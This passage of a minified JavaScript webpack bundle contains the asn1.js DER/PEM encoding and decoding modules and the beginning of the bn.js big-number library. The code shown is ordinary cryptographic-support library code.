I(Q,F){this.name=Q,this.body=F,this.decoders={},this.encoders={}}we.define=function(F,E){return new I(F,E)},I.prototype._createNamed=function(F){const E=this.name;function g(b){this._initNamed(b,E)}return $(g,F),g.prototype._initNamed=function(_,y){F.call(this,_,y)},new g(this)},I.prototype._getDecoder=function(F){return this.decoders.hasOwnProperty(F=F||"der")||(this.decoders[F]=this._createNamed(j[F])),this.decoders[F]},I.prototype.decode=function(F,E,g){return this._getDecoder(E).decode(F,g)},I.prototype._getEncoder=function(F){return this.encoders.hasOwnProperty(F=F||"der")||(this.encoders[F]=this._createNamed(ie[F])),this.encoders[F]},I.prototype.encode=function(F,E,g){return this._getEncoder(E).encode(F,g)}},216:(Pe,we,de)=>{"use strict";const ie=de(2270),j=de(1317).b,$=de(9173).Buffer;function ae(Q,F){j.call(this,F),$.isBuffer(Q)?(this.base=Q,this.offset=0,this.length=Q.length):this.error("Input not Buffer")}function I(Q,F){if(Array.isArray(Q))this.length=0,this.value=Q.map(function(E){return I.isEncoderBuffer(E)||(E=new I(E,F)),this.length+=E.length,E},this);else if("number"==typeof Q){if(!(0<=Q&&Q<=255))return F.error("non-byte EncoderBuffer value");this.value=Q,this.length=1}else if("string"==typeof Q)this.value=Q,this.length=$.byteLength(Q);else{if(!$.isBuffer(Q))return F.error("Unsupported type: "+typeof Q);this.value=Q,this.length=Q.length}}ie(ae,j),we.C=ae,ae.isDecoderBuffer=function(F){return F instanceof ae||"object"==typeof F&&$.isBuffer(F.base)&&"DecoderBuffer"===F.constructor.name&&"number"==typeof F.offset&&"number"==typeof F.length&&"function"==typeof F.save&&"function"==typeof F.restore&&"function"==typeof F.isEmpty&&"function"==typeof F.readUInt8&&"function"==typeof F.skip&&"function"==typeof F.raw},ae.prototype.save=function(){return{offset:this.offset,reporter:j.prototype.save.call(this)}},ae.prototype.restore=function(F){const E=new ae(this.base);return E.offset=F.offset,E.length=this.offset,this.offset=F.offset,j.prototype.restore.call(this,F.reporter),E},ae.prototype.isEmpty=function(){return this.offset===this.length},ae.prototype.readUInt8=function(F){return this.offset+1<=this.length?this.base.readUInt8(this.offset++,!0):this.error(F||"DecoderBuffer overrun")},ae.prototype.skip=function(F,E){if(!(this.offset+F<=this.length))return this.error(E||"DecoderBuffer overrun");const g=new ae(this.base);return g._reporterState=this._reporterState,g.offset=this.offset,g.length=this.offset+F,this.offset+=F,g},ae.prototype.raw=function(F){return this.base.slice(F?F.offset:this.offset,this.length)},we.R=I,I.isEncoderBuffer=function(F){return F instanceof I||"object"==typeof F&&"EncoderBuffer"===F.constructor.name&&"number"==typeof F.length&&"function"==typeof F.join},I.prototype.join=function(F,E){return F||(F=$.alloc(this.length)),E||(E=0),0===this.length||(Array.isArray(this.value)?this.value.forEach(function(g){g.join(F,E),E+=g.length}):("number"==typeof this.value?F[E]=this.value:"string"==typeof this.value?F.write(this.value,E):$.isBuffer(this.value)&&this.value.copy(F,E),E+=this.length)),F}},3784:(Pe,we,de)=>{"use strict";const ie=we;ie.Reporter=de(1317).b,ie.DecoderBuffer=de(216).C,ie.EncoderBuffer=de(216).R,ie.Node=de(2108)},2108:(Pe,we,de)=>{"use strict";const ie=de(1317).b,j=de(216).R,$=de(216).C,ae=de(490),I=["seq","seqof","set","setof","objid","bool","gentime","utctime","null_","enum","int","objDesc","bitstr","bmpstr","charstr","genstr","graphstr","ia5str","iso646str","numstr","octstr","printstr","t61str","unistr","utf8str","videostr"],Q=["key","obj","use","optional","explicit","implicit","def","choice","any","contains"].concat(I);function E(b,_,y){const M={};this._baseState=M,M.name=y,M.enc=b,M.parent=_||null,M.children=null,M.tag=null,M.args=null,M.reverseArgs=null,M.choice=null,M.optional=!1,M.any=!1,M.obj=!1,M.use=null,M.useDecoder=null,M.key=null,M.default=null,M.explicit=null,M.implicit=null,M.contains=null,M.parent||(M.children=[],this._wrap())}Pe.exports=E;const g=["enc","parent","children","tag","args","reverseArgs","choice","optional","any","obj","use","alteredUse","key","default","explicit","implicit","contains"];E.prototype.clone=function(){const _=this._baseState,y={};g.forEach(function(p){y[p]=_[p]});const M=new this.constructor(y.parent);return M._baseState=y,M},E.prototype._wrap=function(){const _=this._baseState;Q.forEach(function(y){this[y]=function(){const p=new this.constructor(this);return _.children.push(p),p[y].apply(p,arguments)}},this)},E.prototype._init=function(_){const y=this._baseState;ae(null===y.parent),_.call(this),y.children=y.children.filter(function(M){return M._baseState.parent===this},this),ae.equal(y.children.length,1,"Root node can have only one child")},E.prototype._useArgs=function(_){const y=this._baseState,M=_.filter(function(p){return p instanceof this.constructor},this);_=_.filter(function(p){return!(p instanceof this.constructor)},this),0!==M.length&&(ae(null===y.children),y.children=M,M.forEach(function(p){p._baseState.parent=this},this)),0!==_.length&&(ae(null===y.args),y.args=_,y.reverseArgs=_.map(function(p){if("object"!=typeof p||p.constructor!==Object)return p;const D={};return Object.keys(p).forEach(function(w){w==(0|w)&&(w|=0),D[p[w]]=w}),D}))},["_peekTag","_decodeTag","_use","_decodeStr","_decodeObjid","_decodeTime","_decodeNull","_decodeInt","_decodeBool","_decodeList","_encodeComposite","_encodeStr","_encodeObjid","_encodeTime","_encodeNull","_encodeInt","_encodeBool"].forEach(function(b){E.prototype[b]=function(){throw new Error(b+" not implemented for encoding: "+this._baseState.enc)}}),I.forEach(function(b){E.prototype[b]=function(){const y=this._baseState,M=Array.prototype.slice.call(arguments);return ae(null===y.tag),y.tag=b,this._useArgs(M),this}}),E.prototype.use=function(_){ae(_);const y=this._baseState;return ae(null===y.use),y.use=_,this},E.prototype.optional=function(){return this._baseState.optional=!0,this},E.prototype.def=function(_){const y=this._baseState;return ae(null===y.default),y.default=_,y.optional=!0,this},E.prototype.explicit=function(_){const y=this._baseState;return ae(null===y.explicit&&null===y.implicit),y.explicit=_,this},E.prototype.implicit=function(_){const y=this._baseState;return ae(null===y.explicit&&null===y.implicit),y.implicit=_,this},E.prototype.obj=function(){const _=this._baseState,y=Array.prototype.slice.call(arguments);return _.obj=!0,0!==y.length&&this._useArgs(y),this},E.prototype.key=function(_){const y=this._baseState;return ae(null===y.key),y.key=_,this},E.prototype.any=function(){return this._baseState.any=!0,this},E.prototype.choice=function(_){const y=this._baseState;return ae(null===y.choice),y.choice=_,this._useArgs(Object.keys(_).map(function(M){return _[M]})),this},E.prototype.contains=function(_){const y=this._baseState;return ae(null===y.use),y.contains=_,this},E.prototype._decode=function(_,y){const M=this._baseState;if(null===M.parent)return _.wrapResult(M.children[0]._decode(_,y));let x,p=M.default,D=!0,w=null;if(null!==M.key&&(w=_.enterKey(M.key)),M.optional){let S=null;if(null!==M.explicit?S=M.explicit:null!==M.implicit?S=M.implicit:null!==M.tag&&(S=M.tag),null!==S||M.any){if(D=this._peekTag(_,S,M.any),_.isError(D))return D}else{const O=_.save();try{null===M.choice?this._decodeGeneric(M.tag,_,y):this._decodeChoice(_,y),D=!0}catch(U){D=!1}_.restore(O)}}if(M.obj&&D&&(x=_.enterObject()),D){if(null!==M.explicit){const O=this._decodeTag(_,M.explicit);if(_.isError(O))return O;_=O}const S=_.offset;if(null===M.use&&null===M.choice){let O;M.any&&(O=_.save());const U=this._decodeTag(_,null!==M.implicit?M.implicit:M.tag,M.any);if(_.isError(U))return U;M.any?p=_.raw(O):_=U}if(y&&y.track&&null!==M.tag&&y.track(_.path(),S,_.length,"tagged"),y&&y.track&&null!==M.tag&&y.track(_.path(),_.offset,_.length,"content"),M.any||(p=null===M.choice?this._decodeGeneric(M.tag,_,y):this._decodeChoice(_,y)),_.isError(p))return p;if(!M.any&&null===M.choice&&null!==M.children&&M.children.forEach(function(U){U._decode(_,y)}),M.contains&&("octstr"===M.tag||"bitstr"===M.tag)){const O=new $(p);p=this._getUse(M.contains,_._reporterState.obj)._decode(O,y)}}return M.obj&&D&&(p=_.leaveObject(x)),null===M.key||null===p&&!0!==D?null!==w&&_.exitKey(w):_.leaveKey(w,M.key,p),p},E.prototype._decodeGeneric=function(_,y,M){const p=this._baseState;return"seq"===_||"set"===_?null:"seqof"===_||"setof"===_?this._decodeList(y,_,p.args[0],M):/str$/.test(_)?this._decodeStr(y,_,M):"objid"===_&&p.args?this._decodeObjid(y,p.args[0],p.args[1],M):"objid"===_?this._decodeObjid(y,null,null,M):"gentime"===_||"utctime"===_?this._decodeTime(y,_,M):"null_"===_?this._decodeNull(y,M):"bool"===_?this._decodeBool(y,M):"objDesc"===_?this._decodeStr(y,_,M):"int"===_||"enum"===_?this._decodeInt(y,p.args&&p.args[0],M):null!==p.use?this._getUse(p.use,y._reporterState.obj)._decode(y,M):y.error("unknown tag: "+_)},E.prototype._getUse=function(_,y){const M=this._baseState;return M.useDecoder=this._use(_,y),ae(null===M.useDecoder._baseState.parent),M.useDecoder=M.useDecoder._baseState.children[0],M.implicit!==M.useDecoder._baseState.implicit&&(M.useDecoder=M.useDecoder.clone(),M.useDecoder._baseState.implicit=M.implicit),M.useDecoder},E.prototype._decodeChoice=function(_,y){const M=this._baseState;let p=null,D=!1;return Object.keys(M.choice).some(function(w){const x=_.save(),S=M.choice[w];try{const O=S._decode(_,y);if(_.isError(O))return!1;p={type:w,value:O},D=!0}catch(O){return _.restore(x),!1}return!0},this),D?p:_.error("Choice not matched")},E.prototype._createEncoderBuffer=function(_){return new j(_,this.reporter)},E.prototype._encode=function(_,y,M){const p=this._baseState;if(null!==p.default&&p.default===_)return;const D=this._encodeValue(_,y,M);return void 0===D||this._skipDefault(D,y,M)?void 0:D},E.prototype._encodeValue=function(_,y,M){const p=this._baseState;if(null===p.parent)return p.children[0]._encode(_,y||new ie);let D=null;if(this.reporter=y,p.optional&&void 0===_){if(null===p.default)return;_=p.default}let w=null,x=!1;if(p.any)D=this._createEncoderBuffer(_);else if(p.choice)D=this._encodeChoice(_,y);else if(p.contains)w=this._getUse(p.contains,M)._encode(_,y),x=!0;else if(p.children)w=p.children.map(function(S){if("null_"===S._baseState.tag)return S._encode(null,y,_);if(null===S._baseState.key)return y.error("Child should have a key");const O=y.enterKey(S._baseState.key);if("object"!=typeof _)return y.error("Child expected, but input is not object");const U=S._encode(_[S._baseState.key],y,_);return y.leaveKey(O),U},this).filter(function(S){return S}),w=this._createEncoderBuffer(w);else if("seqof"===p.tag||"setof"===p.tag){if(!p.args||1!==p.args.length)return y.error("Too many args for : "+p.tag);if(!Array.isArray(_))return y.error("seqof/setof, but data is not Array");const S=this.clone();S._baseState.implicit=null,w=this._createEncoderBuffer(_.map(function(O){return this._getUse(this._baseState.args[0],_)._encode(O,y)},S))}else null!==p.use?D=this._getUse(p.use,M)._encode(_,y):(w=this._encodePrimitive(p.tag,_),x=!0);if(!p.any&&null===p.choice){const S=null!==p.implicit?p.implicit:p.tag,O=null===p.implicit?"universal":"context";null===S?null===p.use&&y.error("Tag could be omitted only for .use()"):null===p.use&&(D=this._encodeComposite(S,x,O,w))}return null!==p.explicit&&(D=this._encodeComposite(p.explicit,!1,"context",D)),D},E.prototype._encodeChoice=function(_,y){const M=this._baseState,p=M.choice[_.type];return p||ae(!1,_.type+" not found in "+JSON.stringify(Object.keys(M.choice))),p._encode(_.value,y)},E.prototype._encodePrimitive=function(_,y){const M=this._baseState;if(/str$/.test(_))return this._encodeStr(y,_);if("objid"===_&&M.args)return this._encodeObjid(y,M.reverseArgs[0],M.args[1]);if("objid"===_)return this._encodeObjid(y,null,null);if("gentime"===_||"utctime"===_)return this._encodeTime(y,_);if("null_"===_)return this._encodeNull();if("int"===_||"enum"===_)return this._encodeInt(y,M.args&&M.reverseArgs[0]);if("bool"===_)return this._encodeBool(y);if("objDesc"===_)return this._encodeStr(y,_);throw new Error("Unsupported tag: "+_)},E.prototype._isNumstr=function(_){return/^[0-9 ]*$/.test(_)},E.prototype._isPrintstr=function(_){return/^[A-Za-z0-9 '()+,-./:=?]*$/.test(_)}},1317:(Pe,we,de)=>{"use strict";const ie=de(2270);function j(ae){this._reporterState={obj:null,path:[],options:ae||{},errors:[]}}function $(ae,I){this.path=ae,this.rethrow(I)}we.b=j,j.prototype.isError=function(I){return I instanceof $},j.prototype.save=function(){const I=this._reporterState;return{obj:I.obj,pathLen:I.path.length}},j.prototype.restore=function(I){const Q=this._reporterState;Q.obj=I.obj,Q.path=Q.path.slice(0,I.pathLen)},j.prototype.enterKey=function(I){return this._reporterState.path.push(I)},j.prototype.exitKey=function(I){const Q=this._reporterState;Q.path=Q.path.slice(0,I-1)},j.prototype.leaveKey=function(I,Q,F){const E=this._reporterState;this.exitKey(I),null!==E.obj&&(E.obj[Q]=F)},j.prototype.path=function(){return this._reporterState.path.join("/")},j.prototype.enterObject=function(){const I=this._reporterState,Q=I.obj;return I.obj={},Q},j.prototype.leaveObject=function(I){const Q=this._reporterState,F=Q.obj;return Q.obj=I,F},j.prototype.error=function(I){let Q;const F=this._reporterState,E=I instanceof $;if(Q=E?I:new $(F.path.map(function(g){return"["+JSON.stringify(g)+"]"}).join(""),I.message||I,I.stack),!F.options.partial)throw Q;return E||F.errors.push(Q),Q},j.prototype.wrapResult=function(I){const Q=this._reporterState;return Q.options.partial?{result:this.isError(I)?null:I,errors:Q.errors}:I},ie($,Error),$.prototype.rethrow=function(I){if(this.message=I+" at: "+(this.path||"(shallow)"),Error.captureStackTrace&&Error.captureStackTrace(this,$),!this.stack)try{throw new Error(this.message)}catch(Q){this.stack=Q.stack}return this}},6629:(Pe,we)=>{"use strict";function de(ie){const j={};return Object.keys(ie).forEach(function($){(0|$)==$&&($|=0),j[ie[$]]=$}),j}we.tagClass={0:"universal",1:"application",2:"context",3:"private"},we.tagClassByName=de(we.tagClass),we.tag={0:"end",1:"bool",2:"int",3:"bitstr",4:"octstr",5:"null_",6:"objid",7:"objDesc",8:"external",9:"real",10:"enum",11:"embed",12:"utf8str",13:"relativeOid",16:"seq",17:"set",18:"numstr",19:"printstr",20:"t61str",21:"videostr",22:"ia5str",23:"utctime",24:"gentime",25:"graphstr",26:"iso646str",27:"genstr",28:"unistr",29:"charstr",30:"bmpstr"},we.tagByName=de(we.tag)},8482:(Pe,we,de)=>{"use strict";const ie=we;ie._reverse=function($){const ae={};return Object.keys($).forEach(function(I){(0|I)==I&&(I|=0),ae[$[I]]=I}),ae},ie.der=de(6629)},6948:(Pe,we,de)=>{"use strict";const ie=de(2270),j=de(9831),$=de(216).C,ae=de(2108),I=de(6629);function Q(b){this.enc="der",this.name=b.name,this.entity=b,this.tree=new F,this.tree._init(b.body)}function F(b){ae.call(this,"der",b)}function E(b,_){let y=b.readUInt8(_);if(b.isError(y))return y;const M=I.tagClass[y>>6],p=0==(32&y);if(31==(31&y)){let w=y;for(y=0;128==(128&w);){if(w=b.readUInt8(_),b.isError(w))return w;y<<=7,y|=127&w}}else y&=31;return{cls:M,primitive:p,tag:y,tagStr:I.tag[y]}}function g(b,_,y){let M=b.readUInt8(y);if(b.isError(M))return M;if(!_&&128===M)return null;if(0==(128&M))return M;const p=127&M;if(p>4)return b.error("length octect is too long");M=0;for(let D=0;D<p;D++){M<<=8;const w=b.readUInt8(y);if(b.isError(w))return w;M|=w}return M}Pe.exports=Q,Q.prototype.decode=function(_,y){return $.isDecoderBuffer(_)||(_=new $(_,y)),this.tree._decode(_,y)},ie(F,ae),F.prototype._peekTag=function(_,y,M){if(_.isEmpty())return!1;const p=_.save(),D=E(_,'Failed to peek tag: "'+y+'"');return _.isError(D)?D:(_.restore(p),D.tag===y||D.tagStr===y||D.tagStr+"of"===y||M)},F.prototype._decodeTag=function(_,y,M){const p=E(_,'Failed to decode tag of "'+y+'"');if(_.isError(p))return p;let D=g(_,p.primitive,'Failed to get length of "'+y+'"');if(_.isError(D))return D;if(!M&&p.tag!==y&&p.tagStr!==y&&p.tagStr+"of"!==y)return _.error('Failed to match tag: "'+y+'"');if(p.primitive||null!==D)return _.skip(D,'Failed to match body of: "'+y+'"');const w=_.save(),x=this._skipUntilEnd(_,'Failed to skip indefinite length body: "'+this.tag+'"');return _.isError(x)?x:(D=_.offset-w.offset,_.restore(w),_.skip(D,'Failed to match body of: "'+y+'"'))},F.prototype._skipUntilEnd=function(_,y){for(;;){const M=E(_,y);if(_.isError(M))return M;const p=g(_,M.primitive,y);if(_.isError(p))return p;let D;if(D=M.primitive||null!==p?_.skip(p):this._skipUntilEnd(_,y),_.isError(D))return D;if("end"===M.tagStr)break}},F.prototype._decodeList=function(_,y,M,p){const D=[];for(;!_.isEmpty();){const w=this._peekTag(_,"end");if(_.isError(w))return w;const x=M.decode(_,"der",p);if(_.isError(x)&&w)break;D.push(x)}return D},F.prototype._decodeStr=function(_,y){if("bitstr"===y){const M=_.readUInt8();return _.isError(M)?M:{unused:M,data:_.raw()}}if("bmpstr"===y){const M=_.raw();if(M.length%2==1)return _.error("Decoding of string type: bmpstr length mismatch");let p="";for(let D=0;D<M.length/2;D++)p+=String.fromCharCode(M.readUInt16BE(2*D));return p}if("numstr"===y){const M=_.raw().toString("ascii");return this._isNumstr(M)?M:_.error("Decoding of string type: numstr unsupported characters")}if("octstr"===y)return _.raw();if("objDesc"===y)return _.raw();if("printstr"===y){const M=_.raw().toString("ascii");return this._isPrintstr(M)?M:_.error("Decoding of string type: printstr unsupported characters")}return/str$/.test(y)?_.raw().toString():_.error("Decoding of string type: "+y+" unsupported")},F.prototype._decodeObjid=function(_,y,M){let p;const D=[];let w=0,x=0;for(;!_.isEmpty();)x=_.readUInt8(),w<<=7,w|=127&x,0==(128&x)&&(D.push(w),w=0);if(128&x&&D.push(w),p=M?D:[D[0]/40|0,D[0]%40].concat(D.slice(1)),y){let U=y[p.join(" ")];void 0===U&&(U=y[p.join(".")]),void 0!==U&&(p=U)}return p},F.prototype._decodeTime=function(_,y){const M=_.raw().toString();let p,D,w,x,S,O;if("gentime"===y)p=0|M.slice(0,4),D=0|M.slice(4,6),w=0|M.slice(6,8),x=0|M.slice(8,10),S=0|M.slice(10,12),O=0|M.slice(12,14);else{if("utctime"!==y)return _.error("Decoding "+y+" time is not supported yet");p=0|M.slice(0,2),D=0|M.slice(2,4),w=0|M.slice(4,6),x=0|M.slice(6,8),S=0|M.slice(8,10),O=0|M.slice(10,12),p=p<70?2e3+p:1900+p}return Date.UTC(p,D-1,w,x,S,O,0)},F.prototype._decodeNull=function(){return null},F.prototype._decodeBool=function(_){const y=_.readUInt8();return _.isError(y)?y:0!==y},F.prototype._decodeInt=function(_,y){const M=_.raw();let p=new j(M);return y&&(p=y[p.toString(10)]||p),p},F.prototype._use=function(_,y){return"function"==typeof _&&(_=_(y)),_._getDecoder("der").tree}},4917:(Pe,we,de)=>{"use strict";const ie=we;ie.der=de(6948),ie.pem=de(1805)},1805:(Pe,we,de)=>{"use strict";const ie=de(2270),j=de(9173).Buffer,$=de(6948);function ae(I){$.call(this,I),this.enc="pem"}ie(ae,$),Pe.exports=ae,ae.prototype.decode=function(Q,F){const E=Q.toString().split(/[\r\n]+/g),g=F.label.toUpperCase(),b=/^-----(BEGIN|END) ([^-]+)-----$/;let _=-1,y=-1;for(let D=0;D<E.length;D++){const w=E[D].match(b);if(null!==w&&w[2]===g){if(-1!==_){if("END"!==w[1])break;y=D;break}if("BEGIN"!==w[1])break;_=D}}if(-1===_||-1===y)throw new Error("PEM section not found for: "+g);const M=E.slice(_+1,y).join("");M.replace(/[^a-z0-9+/=]+/gi,"");const p=j.from(M,"base64");return $.prototype.decode.call(this,p,F)}},8018:(Pe,we,de)=>{"use strict";const ie=de(2270),j=de(9173).Buffer,$=de(2108),ae=de(6629);function I(g){this.enc="der",this.name=g.name,this.entity=g,this.tree=new Q,this.tree._init(g.body)}function Q(g){$.call(this,"der",g)}function F(g){return g<10?"0"+g:g}Pe.exports=I,I.prototype.encode=function(b,_){return this.tree._encode(b,_).join()},ie(Q,$),Q.prototype._encodeComposite=function(b,_,y,M){const p=function E(g,b,_,y){let M;if("seqof"===g?g="seq":"setof"===g&&(g="set"),ae.tagByName.hasOwnProperty(g))M=ae.tagByName[g];else{if("number"!=typeof g||(0|g)!==g)return y.error("Unknown tag: "+g);M=g}return M>=31?y.error("Multi-octet tag encoding unsupported"):(b||(M|=32),M|=ae.tagClassByName[_||"universal"]<<6,M)}(b,_,y,this.reporter);if(M.length<128){const x=j.alloc(2);return x[0]=p,x[1]=M.length,this._createEncoderBuffer([x,M])}let D=1;for(let x=M.length;x>=256;x>>=8)D++;const w=j.alloc(2+D);w[0]=p,w[1]=128|D;for(let x=1+D,S=M.length;S>0;x--,S>>=8)w[x]=255&S;return this._createEncoderBuffer([w,M])},Q.prototype._encodeStr=function(b,_){if("bitstr"===_)return this._createEncoderBuffer([0|b.unused,b.data]);if("bmpstr"===_){const y=j.alloc(2*b.length);for(let M=0;M<b.length;M++)y.writeUInt16BE(b.charCodeAt(M),2*M);return this._createEncoderBuffer(y)}return"numstr"===_?this._isNumstr(b)?this._createEncoderBuffer(b):this.reporter.error("Encoding of string type: numstr supports only digits and space"):"printstr"===_?this._isPrintstr(b)?this._createEncoderBuffer(b):this.reporter.error("Encoding of string type: printstr supports only latin upper and lower case letters, digits, space, apostrophe, left and rigth parenthesis, plus sign, comma, hyphen, dot, slash, colon, equal sign, question mark"):/str$/.test(_)||"objDesc"===_?this._createEncoderBuffer(b):this.reporter.error("Encoding of string type: "+_+" unsupported")},Q.prototype._encodeObjid=function(b,_,y){if("string"==typeof b){if(!_)return this.reporter.error("string objid given, but no values map found");if(!_.hasOwnProperty(b))return this.reporter.error("objid not found in values map");b=_[b].split(/[\s.]+/g);for(let w=0;w<b.length;w++)b[w]|=0}else if(Array.isArray(b)){b=b.slice();for(let w=0;w<b.length;w++)b[w]|=0}if(!Array.isArray(b))return this.reporter.error("objid() should be either array or string, got: "+JSON.stringify(b));if(!y){if(b[1]>=40)return this.reporter.error("Second objid identifier OOB");b.splice(0,2,40*b[0]+b[1])}let M=0;for(let w=0;w<b.length;w++){let x=b[w];for(M++;x>=128;x>>=7)M++}const p=j.alloc(M);let D=p.length-1;for(let w=b.length-1;w>=0;w--){let x=b[w];for(p[D--]=127&x;(x>>=7)>0;)p[D--]=128|127&x}return this._createEncoderBuffer(p)},Q.prototype._encodeTime=function(b,_){let y;const M=new Date(b);return"gentime"===_?y=[F(M.getUTCFullYear()),F(M.getUTCMonth()+1),F(M.getUTCDate()),F(M.getUTCHours()),F(M.getUTCMinutes()),F(M.getUTCSeconds()),"Z"].join(""):"utctime"===_?y=[F(M.getUTCFullYear()%100),F(M.getUTCMonth()+1),F(M.getUTCDate()),F(M.getUTCHours()),F(M.getUTCMinutes()),F(M.getUTCSeconds()),"Z"].join(""):this.reporter.error("Encoding "+_+" time is not supported yet"),this._encodeStr(y,"octstr")},Q.prototype._encodeNull=function(){return this._createEncoderBuffer("")},Q.prototype._encodeInt=function(b,_){if("string"==typeof b){if(!_)return this.reporter.error("String int or enum given, but no values map");if(!_.hasOwnProperty(b))return this.reporter.error("Values map doesn't contain: "+JSON.stringify(b));b=_[b]}if("number"!=typeof b&&!j.isBuffer(b)){const p=b.toArray();!b.sign&&128&p[0]&&p.unshift(0),b=j.from(p)}if(j.isBuffer(b)){let p=b.length;0===b.length&&p++;const D=j.alloc(p);return b.copy(D),0===b.length&&(D[0]=0),this._createEncoderBuffer(D)}if(b<128)return this._createEncoderBuffer(b);if(b<256)return this._createEncoderBuffer([0,b]);let y=1;for(let p=b;p>=256;p>>=8)y++;const M=new Array(y);for(let p=M.length-1;p>=0;p--)M[p]=255&b,b>>=8;return 128&M[0]&&M.unshift(0),this._createEncoderBuffer(j.from(M))},Q.prototype._encodeBool=function(b){return this._createEncoderBuffer(b?255:0)},Q.prototype._use=function(b,_){return"function"==typeof b&&(b=b(_)),b._getEncoder("der").tree},Q.prototype._skipDefault=function(b,_,y){const M=this._baseState;let p;if(null===M.default)return!1;const D=b.join();if(void 0===M.defaultBuffer&&(M.defaultBuffer=this._encodeValue(M.default,_,y).join()),D.length!==M.defaultBuffer.length)return!1;for(p=0;p<D.length;p++)if(D[p]!==M.defaultBuffer[p])return!1;return!0}},6530:(Pe,we,de)=>{"use strict";const ie=we;ie.der=de(8018),ie.pem=de(3510)},3510:(Pe,we,de)=>{"use strict";const ie=de(2270),j=de(8018);function $(ae){j.call(this,ae),this.enc="pem"}ie($,j),Pe.exports=$,$.prototype.encode=function(I,Q){const E=j.prototype.encode.call(this,I).toString("base64"),g=["-----BEGIN "+Q.label+"-----"];for(let b=0;b<E.length;b+=64)g.push(E.slice(b,b+64));return g.push("-----END "+Q.label+"-----"),g.join("\n")}},9831:function(Pe,we,de){!function(ie,j){"use strict";function $(z,l){if(!z)throw new Error(l||"Assertion failed")}function ae(z,l){z.super_=l;var f=function(){};f.prototype=l.prototype,z.prototype=new f,z.prototype.constructor=z}function I(z,l,f){if(I.isBN(z))return z;this.negative=0,this.words=null,this.length=0,this.red=null,null!==z&&(("le"===l||"be"===l)&&(f=l,l=10),this._init(z||0,l||10,f||"be"))}var Q;"object"==typeof ie?ie.exports=I:j.BN=I,I.BN=I,I.wordSize=26;try{Q="undefined"!=typeof window&&void 0!==window.Buffer?window.Buffer:de(950).Buffer}catch(z){}function F(z,l){var f=z.charCodeAt(l);return f>=65&&f<=70?f-55:f>=97&&f<=102?f-87:f-48&15}function E(z,l,f){var A=F(z,f);return f-1>=l&&(A|=F(z,f-1)<<4),A}function g(z,l,f,A){for(var v=0,P=Math.min(z.length,f),G=l;G<P;G++){var X=z.charCodeAt(G)-48;v*=A,v+=X>=49?X-49+10:X>=17?X-17+10:X}return v}I.isBN=function(l){return l instanceof I||null!==l&&"object"==typeof l&&l.constructor.wordSize===I.wordSize&&Array.isArray(l.words)},I.max=function(l,f){return l.cmp(f)>0?l:f},I.min=function(l,f){return l.cmp(f)<0?l:f},I.prototype._init=function(l,f,A){if("number"==typeof l)return this._initNumber(l,f,A);if("object"==typeof l)return this._initArray(l,f,A);"hex"===f&&(f=16),$(f===(0|f)&&f>=2&&f<=36);var v=0;"-"===(l=l.toString().replace(/\s+/g,""))[0]&&(v++,this.negative=1),v<l.length&&(16===f?this._parseHex(l,v,A):(this._parseBase(l,f,v),"le"===A&&this._initArray(this.toArray(),f,A)))},I.prototype._initNumber=function(l,f,A){l<0&&(this.negative=1,l=-l),l<67108864?(this.words=[67108863&l],this.length=1):l<4503599627370496?(this.words=[67108863&l,l/67108864&67108863],this.length=2):($(l<9007199254740992),this.words=[67108863&l,l/67108864&67108863,1],this.length=3),"le"===A&&this._initArray(this.toArray(),f,A)},I.prototype._initArray=function(l,f,A){if($("number"==typeof l.length),l.length<=0)return this.words=[0],this.length=1,this;this.length=Math.ceil(l.length/3),this.words=new Array(this.length);for(var v=0;v<this.length;v++)this.words[v]=0;var P,G,X=0;if("be"===A)for(v=l.length-1,P=0;v>=0;v-=3)this.words[P]|=(G=l[v]|l[v-1]<<8|l[v-2]<<16)<<X&67108863,this.words[P+1]=G>>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);else if("le"===A)for(v=0,P=0;v<l.length;v+=3)this.words[P]|=(G=l[v]|l[v+1]<<8|l[v+2]<<16)<<X&67108863,this.words[P+1]=G>>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);return this.strip()},I.prototype._parseHex=function(l,f,A){this.length=Math.ceil((l.length-f)/6),this.words=new Array(this.length);for(var v=0;v<this.length;v++)this.words[v]=0;var X,P=0,G=0;if("be"===A)for(v=l.length-1;v>=f;v-=2)X=E(l,f,v)<<P,this.words[G]|=67108863&X,P>=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;else for(v=(l.length-f)%2==0?f+1:f;v<l.length;v+=2)X=E(l,f,v)<<P,this.words[G]|=67108863&X,P>=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;this.strip()},I.prototype._parseBase=function(l,f,A){this.words=[0],this.length=1;for(var v=0,P=1;P<=67108863;P*=f)v++;v--,P=P/f|0;for(var G=l.length-A,X=G%v,L=Math.min(G,G-X)+A,h=0,R=A;R<L;R+=v)h=g(l,R,R+v,f),this.imuln(P),this.words[0]+h<67108864?this.words[0]+=h:this._iaddn(h);if(0!==X){var J=1;for(h=g(l,R,l.length,f),R=0;R<X;R++)J*=f;this.imuln(J),this.words[0]+h<67108864?this.words[0]+=h:this._iaddn(h)}this.strip()},I.prototype.copy=function(l){l.words=new Array(this.length);for(var f=0;f<this.length;f++)l.words[f]=this.words[f];l.length=this.length,l.negative=this.negative,l.red=this.red},I.prototype.clone=function(){var l=new I(null);return this.copy(l),l},I.prototype._expand=function(l){for(;this.length<l;)this.words[this.length++]=0;return this},I.prototype.strip=function(){for(;this.length>1&&0===this.words[this.length-1];)this.length--;return this._normSign()},I.prototype._normSign=function(){return 1===this.length&&0===this.words[0]&&(this.negative=0),this},I.prototype.inspect=function(){return(this.red?"<BN-R: ":"<BN: ")+this.toString(16)+">"};var b=["","0","00","000","0000","00000","000000","0000000","00000000","000000000","0000000000","00000000000","000000000000","0000000000000","00000000000000","000000000000000","0000000000000000","00000000000000000","000000000000000000","0000000000000000000","00000000000000000000","000000000000000000000","0000000000000000000000","00000000000000000000000","000000000000000000000000","0000000000000000000000000"],_=[0,0,25,16,12,11,10,9,8,8,7,7,7,7,6,6,6,6,6,6,6,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5],y=[0,0,33554432,43046721,16777216,48828125,60466176,40353607,16777216,43046721,1e7,19487171,35831808,62748517,7529536,11390625,16777216,24137569,34012224,47045881,64e6,4084101,5153632,6436343,7962624,9765625,11881376,14348907,17210368,20511149,243e5,28629151,33554432,39135393,45435424,52521875,60466176];function p(z,l,f){f.negative=l.negative^z.negative;var A=z.length+l.length|0;f.length=A,A=A-1|0;var v=0|z.words[0],P=0|l.words[0],G=v*P,L=G/67108864|0;f.words[0]=67108863&G;for(var h=1;h<A;h++){for(var 